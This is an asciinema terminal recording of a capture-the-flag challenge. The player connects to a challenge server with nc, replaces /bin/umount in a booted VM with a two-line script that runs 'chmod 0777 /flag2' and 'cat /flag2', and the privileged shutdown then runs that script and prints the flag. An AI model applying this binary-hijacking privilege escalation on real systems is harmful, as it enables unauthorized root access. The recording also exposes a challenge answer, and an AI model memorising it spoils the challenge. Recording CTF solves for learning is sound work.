{"version": 2, "width": 80, "height": 25, "timestamp": 1667011273, "env": {"SHELL": "/bin/zsh", "TERM": "xterm-256color"}}
[1.206037, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m                                                                               \r \r"]
[1.206963, "o", "\u001b]0; kxxt@spectre:~ \u0007"]
[1.24227, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\r\n \u001b[1;31m╭─\u001b[0m\u001b[1;31mkxxt\u001b[0m@\u001b[1;2;31mspectre\u001b[0m in \u001b[35m~\u001b[0m took \u001b[1;33m1s\u001b[0m\r\n \u001b[1;31m╰─λ\u001b[0m \u001b[K"]
[1.242484, "o", "\u001b[?1h\u001b="]
[1.242627, "o", "\u001b[?2004h"]
[5.604863, "o", "\u001b[7m\u001b[32mstty\u001b[39m\u001b[7m raw -echo; \u001b[7m\u001b[32mnc\u001b[39m\u001b[7m 202.38.93.111 10338; \u001b[7m\u001b[32mstty\u001b[39m\u001b[7m sane\u001b[27m"]
[5.886445, "o", "\u001b[49D\u001b[27m\u001b[32ms\u001b[27m\u001b[32mt\u001b[27m\u001b[32mt\u001b[27m\u001b[32my\u001b[39m\u001b[27m \u001b[27mr\u001b[27ma\u001b[27mw\u001b[27m \u001b[27m-\u001b[27me\u001b[27mc\u001b[27mh\u001b[27mo\u001b[27m;\u001b[27m \u001b[27m\u001b[32mn\u001b[27m\u001b[32mc\u001b[39m\u001b[27m \u001b[27m2\u001b[27m0\u001b[27m2\u001b[27m.\u001b[27m3\u001b[27m8\u001b[27m.\u001b[27m9\u001b[27m3\u001b[27m.\u001b[27m1\u001b[27m1\u001b[27m1\u001b[27m \u001b[27m1\u001b[27m0\u001b[27m3\u001b[27m3\u001b[27m8\u001b[27m;\u001b[27m \u001b[27m\u001b[32ms\u001b[27m\u001b[32mt\u001b[27m\u001b[32mt\u001b[27m\u001b[32my\u001b[39m\u001b[27m \u001b[27ms\u001b[27ma\u001b[27mn\u001b[27me"]
[5.89041, "o", "\u001b[?2004l"]
[5.890497, "o", "\u001b[?1l\u001b>"]
[5.890582, "o", "\r\r\n"]
[6.089219, "o", "Please input your token: "]
[11.178975, "o", "\u001bc\u001b[?7l"]
[11.179106, "o", "\u001b[2J"]
[11.18507, "o", "\u001b[0mSe"]
[11.185324, "o", "aB"]
[11.185572, "o", "I"]
[11.186357, "o", "OS"]
[11.221296, "o", " (version 1.14.0-2)\r\n\n\niPXE (http://ipxe.org) 00:03.0 CA00 PCI2.10 PnP PMM+0FF8F360+0FECF360 CA00\r\nPress Ctrl-B to configure iPXE (PCI 00:03.0)...\r                                                                              "]
[11.230192, "o", " \r\n\n\n"]
[11.230303, "o", "Bo"]
[11.230335, "o", "ot"]
[11.230518, "o", "i"]
[11.230579, "o", "n"]
[11.23102, "o", "g fr"]
[11.231279, "o", "om"]
[11.231498, "o", " "]
[11.231926, "o", "ROM."]
[11.23206, "o", "."]
[11.27318, "o", ".\r\n"]
[11.291533, "o", "\u001bc\u001b[?7l\u001b[2J"]
[18.234087, "o", "[    5.090647] Dev sda: unable to read RDB block 1\r\n"]
[18.238498, "o", "[    5.095983] Dev sda: unable to read RDB block 1\r\n"]
[19.88295, "o", "/ $ \u001b[6n"]
[20.143354, "o", "r"]
[20.143493, "o", "m"]
[20.770682, "o", " "]
[21.163351, "o", "/"]
[22.050917, "o", "b"]
[22.246984, "o", "i"]
[22.514281, "o", "n"]
[22.958019, "o", "/"]
[23.487148, "o", "m"]
[23.584381, "o", "\u0007\r/ $ rm /bin/m\u001b[J"]
[24.283122, "o", "\b\u001b[J"]
[24.958941, "o", "u"]
[25.19454, "o", "m"]
[25.320175, "o", "\r/ $ rm /bin/umount \u001b[J"]
[25.794892, "o", "\r\n"]
[25.812885, "o", "/ $ \u001b[6n"]
[26.599676, "o", "v"]
[26.770059, "o", "i"]
[26.906262, "o", " "]
[27.286298, "o", "/"]
[27.818228, "o", "b"]
[28.017914, "o", "i"]
[28.226491, "o", "n"]
[28.915962, "o", "/"]
[29.226419, "o", "u"]
[29.446576, "o", "m"]
[29.551252, "o", "\u0007"]
[30.586862, "o", "o"]
[30.83043, "o", "u"]
[31.038683, "o", "n"]
[31.13489, "o", "t"]
[32.930728, "o", "\r\n"]
[32.943171, "o", "\u001b[?1049h\u001b[999;999H\u001b[6n"]
[32.992513, "o", "\u001b[H\u001b[J\u001b[2;1H~\u001b[3;1H~\u001b[4;1H~\u001b[5;1H~\u001b[6;1H~\u001b[7;1H~\u001b[8;1H~\u001b[9;1H~\u001b[10;1H~\u001b[1"]
[32.992816, "o", "1;1H~\u001b[12;1H~\u001b[13;1H~\u001b[14;1H~\u001b[15;1H~\u001b[16;1H~\u001b[17;1H~\u001b[18;1H~\u001b[19;1H~\u001b[20;1H~\u001b[21;1H~\u001b[22;1H~\u001b[23;1H~\u001b[24;1H~\u001b[1;1H\u001b[2"]
[33.034594, "o", "5;1H\u001b[K- /bin/umount 1/1 100%\u001b[1;1H"]
[33.964239, "o", "\u001b[1;1H\u001b[25;1H\u001b[KI /bin/umount 1/1 100%\u001b[1;1H"]
[35.10438, "o", "\u001b[1;1Hc\u001b[1;2H"]
[35.310221, "o", "\u001b[1;2Hh\u001b[1;3H"]
[35.75144, "o", "\u001b[1;3Hnm\u001b[1;5H"]
[36.319271, "o", "\u001b[1;4H \u001b[1;4H\u001b[25;1H\u001b[KI /bin/umount [Modified] 1/1 100%\u001b[1;4H"]
[36.463854, "o", "\u001b[1;3H \u001b[1;3H"]
[37.151989, "o", "\u001b[1;3Hm\u001b[1;4H"]
[37.38674, "o", "\u001b[1;4Ho\u001b[1;5H"]
[39.094974, "o", "\u001b[1;5Hd\u001b[1;6H"]
[39.243541, "o", "\u001b[1;7H"]
[40.247926, "o", "\u001b[1;7H0\u001b[1;8H"]
[40.587031, "o", "\u001b[1;8H7\u001b[1;9H"]
[40.735209, "o", "\u001b[1;9H7\u001b[1;10H"]
[40.879128, "o", "\u001b[1;10H7\u001b[1;11H"]
[41.067547, "o", "\u001b[1;12H"]
[41.63977, "o", "\u001b[1;12Hf\u001b[1;13H"]
[41.847614, "o", "\u001b[1;13Hl\u001b[1;14H"]
[41.955053, "o", "\u001b[1;14Ha\u001b[1;15H"]
[42.143685, "o", "\u001b[1;15Hg\u001b[1;16H"]
[42.319076, "o", "\u001b[1;16H2\u001b[1;17H"]
[43.114133, "o", "\u001b[1;16H"]
[43.250474, "o", "\u001b[1;15H"]
[43.402758, "o", "\u001b[1;14H"]
[43.53438, "o", "\u001b[1;13H"]
[43.817738, "o", "\u001b[1;12H"]
[44.56139, "o", "\u001b[1;12H/flag2\u001b[1;13H"]
[44.960868, "o", "\u001b[1;18H"]
[45.195394, "o", "\u001b[2;1H \u001b[2;1H\u001b[25;1H\u001b[KI /bin/umount [Modified] 2/2 100%\u001b[2;1H"]
[46.864768, "o", "\u001b[2;1Hc\u001b[2;2H"]
[47.047668, "o", "\u001b[2;2Ha\u001b[2;3H"]
[47.232617, "o", "\u001b[2;3Ht\u001b[2;4H"]
[47.332076, "o", "\u001b[2;5H"]
[47.982984, "o", "\u001b[2;5H/\u001b[2;6H"]
[48.166602, "o", "\u001b[2;6Hf\u001b[2;7H"]
[48.390167, "o", "\u001b[2;7Hl\u001b[2;8H"]
[48.501594, "o", "\u001b[2;8Ha\u001b[2;9H"]
[48.660054, "o", "\u001b[2;9Hg\u001b[2;10H"]
[48.818913, "o", "\u001b[2;10H2\u001b[2;11H"]
[50.678394, "o", "\u001b[2;10H\u001b[25;1H\u001b[K- /bin/umount [Modified] 2/2 100%\u001b[2;10H"]
[51.577432, "o", "\u001b[25;1H\u001b[K:"]
[51.780805, "o", "w"]
[51.888765, "o", "q"]
[52.099194, "o", "\u001b[2;10H\u001b[2;10H\u001b[25;1H\u001b[K'/bin/umount' 2L, 29C\u001b[2;10H"]
[52.099652, "o", "\u001b[25;1H\u001b[K\u001b[?1049l"]
[52.103316, "o", "/ $ \u001b[6n"]
[53.462634, "o", "c"]
[53.642097, "o", "h"]
[54.355004, "o", "mop"]
[54.413848, "o", "d"]
[54.855438, "o", "\b\u001b[J"]
[55.115368, "o", "\b\u001b[J"]
[55.262429, "o", "d"]
[55.407068, "o", " "]
[55.917711, "o", "+"]
[56.033884, "o", "x"]
[56.137545, "o", " "]
[56.828496, "o", "/"]
[56.996533, "o", "b"]
[57.219939, "o", "i"]
[57.437029, "o", "n"]
[57.557778, "o", "\r/ $ chmod +x /bin/\u001b[J"]
[58.370784, "o", "u"]
[58.578576, "o", "m"]
[58.643533, "o", "\r/ $ chmod +x /bin/umount \u001b[J"]
[59.053372, "o", "\r\n"]
[59.066638, "o", "/ $ \u001b[6n"]
[60.113832, "o", "\r\n"]
[60.152022, "o", "flag{D0_n0t_O0o0pen_me__unles5_u_tr4aced_my_p4th_09c3ee62c8}\r\n\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000"]
[60.152155, "o", "\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000"]
[60.193984, "o", "\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000flag{D0_n0t_O0o0pen_me__unles5_u_tr4aced_my_p4th_09c3ee62c8}\r\n\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000"]
[60.21279, "o", "[   47.095182] reboot: Power down\r\n"]
[60.375618, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m                                                                               \r \r"]
[60.375841, "o", "\u001b]0; kxxt@spectre:~ \u0007"]
[60.416051, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\r\n \u001b[1;31m╭─\u001b[0m\u001b[1;31mkxxt\u001b[0m@\u001b[1;2;31mspectre\u001b[0m in \u001b[35m~\u001b[0m took \u001b[1;33m54s\u001b[0m\r\n \u001b[1;31m╰─λ\u001b[0m \u001b[K"]
[60.416277, "o", "\u001b[?1h\u001b="]
[60.416404, "o", "\u001b[?2004h"]
[62.017237, "o", "\u001b[?2004l\r\r\n"]
